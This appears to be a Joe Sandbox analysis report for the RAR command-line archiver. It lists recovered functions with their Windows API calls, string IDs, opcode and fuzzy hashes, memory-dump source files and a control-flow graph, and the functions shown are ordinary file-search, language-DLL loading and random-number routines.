                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                        • API String ID: 0-1628410872
                                                                                                                                                                                                                                        • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                        • Instruction ID: d9267d89115f5de78b3842f1af3ecfa081f81c527df62ab55ef27389ace7813b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6C2D53290F182E1EA269F2482441BDA791AF01794FD844BBCA2ED72C5DE6DFD47D360
                                                                                                                                                                                                                                        Function 00007FF6AA181884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                        • API String ID: 0-1660254149
                                                                                                                                                                                                                                        • Opcode ID: 76a21640ef4bcccfa9a7efadb4a2dc46ecd4c92dd8f64b01b83c3229c4f9755b
                                                                                                                                                                                                                                        • Instruction ID: a27c43ede710ac0b7fc573ae7f84dba0b1e4850391e18dc5db46cdd59d19a1c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76a21640ef4bcccfa9a7efadb4a2dc46ecd4c92dd8f64b01b83c3229c4f9755b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78E2E126A0AAC2E5EB22DF25C8401FD27A2FB59788F4540B7CA5D87796DF3DD946C300
                                                                                                                                                                                                                                        Function 00007FF6AA1C48CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1C4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6AA19CC90), ref: 00007FF6AA1C4AF5
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C492E
                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C496A
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNELBASE(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4993
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C499F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                        • String ID: rarlng.dll
                                                                                                                                                                                                                                        • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                        • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                        • Instruction ID: ddd01e97a45bf51e1714abada74a8e597cfd52db01349efc5d252a6a6db3b370
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4131903171AA92E5FB668F21E8442E923A1FB45784F848077EA4D83698DF3CED57C700
                                                                                                                                                                                                                                        Function 00007FF6AA1A46EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A4736
                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A476B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A477A
                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A47A4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,00007FF6AA1A4620,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A47B2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 869497890-0
                                                                                                                                                                                                                                        • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                        • Instruction ID: fb65e0763086a5658b48b40d6e5944de26f9f1adfd1aa0067d21bf21ba687a87
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F541C732B0A6C1E6DA659B65E4402E963A0FB497B4F404372EA7D833C5DF7CE95A8700
                                                                                                                                                                                                                                        Function 00007FF6AA19901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1815803762-0
                                                                                                                                                                                                                                        • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                        • Instruction ID: 97035f92447a87ad8b02556127b1d37e70de1a6bacae39024de7ee4220076fa8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB01AD2AB0868082E7408B12A94433D6761EBC0FD0F188076CE4E83B68DF7EDD46C700
                                                                                                                                                                                                                                        Function 00007FF6AA18B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Char
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 751630497-0
                                                                                                                                                                                                                                        • Opcode ID: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                        • Instruction ID: d1db1b02d44bad293199228e395968304b4172fa153af513bfda096166d4349b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B229032A0D682E6E716DF30D4801FE7BA0FB44B88F584177DA8D86699DE78ED46C740
                                                                                                                                                                                                                                        Function 00007FF6AA1AAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0552f59dc804d2e0d20b2d282ad9cfd142ccfb886900338c14155ce18a5671af
                                                                                                                                                                                                                                        • Instruction ID: 2521cd7a68155f4af9510f4a998c4800feb86ae5f15487d6c1c421752166c940
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0552f59dc804d2e0d20b2d282ad9cfd142ccfb886900338c14155ce18a5671af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8671C132A0668586D745DF35E4052ED33E2FB88B98F084136DB5DCB399DF78A852C790
                                                                                                                                                                                                                                        Function 00007FF6AA1C3EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 635 7ff6aa1c3ea8-7ff6aa1c3f03 call 7ff6aa1da5a0 call 7ff6aa1dc8a0 640 7ff6aa1c3f40-7ff6aa1c3f50 call 7ff6aa1ca9e8 635->640 641 7ff6aa1c3f05-7ff6aa1c3f3e GetModuleFileNameW call 7ff6aa1b4e14 call 7ff6aa1ca9c0 635->641 645 7ff6aa1c3f55-7ff6aa1c3f79 call 7ff6aa1a1874 call 7ff6aa1a1e80 640->645 641->645 652 7ff6aa1c3f7f-7ff6aa1c3f89 645->652 653 7ff6aa1c4692-7ff6aa1c46c5 call 7ff6aa1a18ac call 7ff6aa1da610 645->653 655 7ff6aa1c3fae-7ff6aa1c3feb call 7ff6aa1dec70 * 2 652->655 656 7ff6aa1c3f8b-7ff6aa1c3fac call 7ff6aa1c11c0 * 2 652->656 668 7ff6aa1c3fef-7ff6aa1c3ff3 655->668 656->655 669 7ff6aa1c40f2-7ff6aa1c4112 call 7ff6aa1a22e0 call 7ff6aa1deb90 668->669 670 7ff6aa1c3ff9-7ff6aa1c402d call 7ff6aa1a2440 call 7ff6aa1a2150 668->670 669->653 679 7ff6aa1c4118-7ff6aa1c4131 call 7ff6aa1a2150 669->679 680 7ff6aa1c4033 670->680 681 7ff6aa1c40bc-7ff6aa1c40e2 call 7ff6aa1a22e0 670->681 693 7ff6aa1c4133-7ff6aa1c4136 679->693 694 7ff6aa1c4138-7ff6aa1c414b call 7ff6aa1deb90 679->694 684 7ff6aa1c403a-7ff6aa1c403e 680->684 681->668 690 7ff6aa1c40e8-7ff6aa1c40ec 681->690 687 7ff6aa1c4040-7ff6aa1c4044 684->687 688 7ff6aa1c4064-7ff6aa1c4069 684->688 687->688 689 7ff6aa1c4046-7ff6aa1c405e call 7ff6aa1e2290 687->689 691 7ff6aa1c4097-7ff6aa1c409f 688->691 692 7ff6aa1c406b-7ff6aa1c4070 688->692 707 7ff6aa1c4060 689->707 708 7ff6aa1c40a3-7ff6aa1c40a7 689->708 690->653 690->669 697 7ff6aa1c40a1 691->697 698 7ff6aa1c40b7 691->698 692->691 696 7ff6aa1c4072-7ff6aa1c4078 692->696 699 7ff6aa1c416f-7ff6aa1c41b1 call 7ff6aa1ca900 call 7ff6aa1deb90 693->699 694->653 706 7ff6aa1c4151-7ff6aa1c416c call 7ff6aa1cd54c call 7ff6aa1deb88 694->706 703 7ff6aa1c4093 696->703 704 7ff6aa1c407a-7ff6aa1c4091 call 7ff6aa1e1700 696->704 697->684 698->681 718 7ff6aa1c41c0-7ff6aa1c41d5 699->718 719 7ff6aa1c41b3-7ff6aa1c41bb call 7ff6aa1deb88 699->719 703->691 704->703 716 7ff6aa1c40a9-7ff6aa1c40b5 704->716 706->699 707->688 708->698 716->681 722 7ff6aa1c45f0-7ff6aa1c4624 call 7ff6aa1c3884 call 7ff6aa1deb88 * 2 718->722 723 7ff6aa1c41db 718->723 719->653 762 7ff6aa1c4626-7ff6aa1c4648 call 7ff6aa1c11c0 * 2 722->762 763 7ff6aa1c464a-7ff6aa1c4691 call 7ff6aa1dec70 * 2 722->763 726 7ff6aa1c41e1-7ff6aa1c41ee 723->726 727 7ff6aa1c41f4-7ff6aa1c41fa 726->727 728 7ff6aa1c4508-7ff6aa1c4513 726->728 730 7ff6aa1c4208-7ff6aa1c420e 727->730 731 7ff6aa1c41fc-7ff6aa1c4202 727->731 728->722 733 7ff6aa1c4519-7ff6aa1c4523 728->733 734 7ff6aa1c43d0-7ff6aa1c43e0 call 7ff6aa1ca580 730->734 735 7ff6aa1c4214-7ff6aa1c425c 730->735 731->728 731->730 737 7ff6aa1c4585-7ff6aa1c4589 733->737 738 7ff6aa1c4525-7ff6aa1c452b 733->738 758 7ff6aa1c44f0-7ff6aa1c4503 734->758 759 7ff6aa1c43e6-7ff6aa1c4414 call 7ff6aa1ca9e8 call 7ff6aa1e172c 734->759 741 7ff6aa1c4261-7ff6aa1c4264 735->741 743 7ff6aa1c45a3-7ff6aa1c45d4 call 7ff6aa1c3884 737->743 744 7ff6aa1c458b-7ff6aa1c458f 737->744 739 7ff6aa1c4531-7ff6aa1c4539 738->739 740 7ff6aa1c45db-7ff6aa1c45de 738->740 747 7ff6aa1c4573-7ff6aa1c457a 739->747 748 7ff6aa1c453b-7ff6aa1c453e 739->748 740->722 749 7ff6aa1c45e0-7ff6aa1c45e5 740->749 750 7ff6aa1c4268-7ff6aa1c4270 741->750 743->740 744->743 752 7ff6aa1c4591-7ff6aa1c4597 744->752 760 7ff6aa1c457e-7ff6aa1c4583 747->760 755 7ff6aa1c4540-7ff6aa1c4543 748->755 756 7ff6aa1c456a-7ff6aa1c4571 748->756 749->726 750->750 757 7ff6aa1c4272-7ff6aa1c4288 call 7ff6aa1e1700 750->757 752->740 761 7ff6aa1c4599-7ff6aa1c45a1 752->761 765 7ff6aa1c4561-7ff6aa1c4568 755->765 766 7ff6aa1c4545-7ff6aa1c4548 755->766 756->760 779 7ff6aa1c42a3 757->779 780 7ff6aa1c428a-7ff6aa1c4295 757->780 758->728 759->758 787 7ff6aa1c441a-7ff6aa1c44a9 call 7ff6aa1cd840 call 7ff6aa1ca900 call 7ff6aa1ca8c4 call 7ff6aa1ca900 call 7ff6aa1e15fc 759->787 760->740 761->740 762->763 763->653 765->760 771 7ff6aa1c4558-7ff6aa1c455f 766->771 772 7ff6aa1c454a-7ff6aa1c454d 766->772 771->760 772->752 777 7ff6aa1c454f-7ff6aa1c4556 772->777 777->760 786 7ff6aa1c42a7-7ff6aa1c42be 779->786 780->779 784 7ff6aa1c4297-7ff6aa1c42a1 780->784 784->786 786->741 788 7ff6aa1c42c0-7ff6aa1c42c2 786->788 822 7ff6aa1c44bf-7ff6aa1c44cf 787->822 823 7ff6aa1c44ab-7ff6aa1c44bb 787->823 790 7ff6aa1c42c4-7ff6aa1c42d6 call 7ff6aa1ca900 788->790 791 7ff6aa1c42e6 788->791 795 7ff6aa1c42db-7ff6aa1c42e1 790->795 791->734 792 7ff6aa1c42ec 791->792 796 7ff6aa1c42f1-7ff6aa1c42f7 792->796 799 7ff6aa1c45d6 795->799 800 7ff6aa1c4300-7ff6aa1c4303 796->800 801 7ff6aa1c42f9-7ff6aa1c42fe 796->801 799->740 800->796 801->800 803 7ff6aa1c4305-7ff6aa1c4314 801->803 805 7ff6aa1c4316-7ff6aa1c4320 803->805 806 7ff6aa1c433d-7ff6aa1c4347 803->806 808 7ff6aa1c4323-7ff6aa1c4327 805->808 809 7ff6aa1c434d-7ff6aa1c4378 call 7ff6aa1cd840 806->809 810 7ff6aa1c45ea-7ff6aa1c45ef call 7ff6aa1da774 806->810 808->806 813 7ff6aa1c4329-7ff6aa1c433b 808->813 819 7ff6aa1c439e-7ff6aa1c43cb call 7ff6aa1c470c 809->819 820 7ff6aa1c437a-7ff6aa1c4399 call 7ff6aa1e1764 809->820 810->722 813->806 813->808 819->795 820->795 827 7ff6aa1c44d2-7ff6aa1c44d8 822->827 823->822 828 7ff6aa1c44eb-7ff6aa1c44ee 827->828 829 7ff6aa1c44da-7ff6aa1c44e5 827->829 828->827 829->799 829->828
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                        • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                        • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                        • Instruction ID: cf4814180cfc0fb5bee661fd98a204b309c43573aebd9021cd7e86257ea268db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA229C22B1E692E4EA229F15D4446F963A1FF44784F804177EA4EC7AD9EF2CED46C300
